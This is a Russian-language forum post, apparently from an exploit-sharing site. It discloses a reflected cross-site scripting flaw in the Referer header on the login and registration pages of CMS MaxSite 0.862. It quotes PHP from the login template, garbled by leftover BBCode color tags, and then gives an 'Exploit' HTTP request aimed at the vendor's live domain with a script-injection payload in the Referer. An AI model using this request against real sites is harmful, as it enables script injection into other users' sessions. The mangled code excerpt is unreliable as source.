11.04.2014, 17:04
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
Провел на форуме:
132418
Репутация:
652
|
|
CMS MaxSite
Version 0.862 - последняя версия!
Официальный сайт http://www.max-3000.com
passive XSS (reflected) в заголовке Referer
Уязвимости на странице с формой регистрации и странице авторизации.
Вектор проведения атаки идентичен, поэтому рассмотрю только страницу авторизации.
127.0.0.1/MaxSite/application/maxsite/templates/default/components/_login/_login.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]config[/COLOR][COLOR="#DD0000"]['site_url'] . 'login"[/COLOR][COLOR="#0000BB"]name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"flogin"[/COLOR][COLOR="#007700"]>
[/COLOR][COLOR="#0000BB"]config[/COLOR][COLOR="#DD0000"]['site_url'] . mso_current_url() . '"[/COLOR][COLOR="#0000BB"]name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"flogin_redirect"[/COLOR][COLOR="#007700"]>
[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#DD0000"]['session']['session_id'] . '"[/COLOR][COLOR="#0000BB"]name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"flogin_session_id"[/COLOR][COLOR="#007700"]>[/COLOR][/COLOR]
Exploit:
Сообщение от None
GET /loginform/ HTTP/1.1
Host: max-3000.com
User-Agent: Mozilla
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer
:
http://www.google.com/search?hl=en&q=">alert(1)
Cookie: ci_session=
Connection: close
|
|
|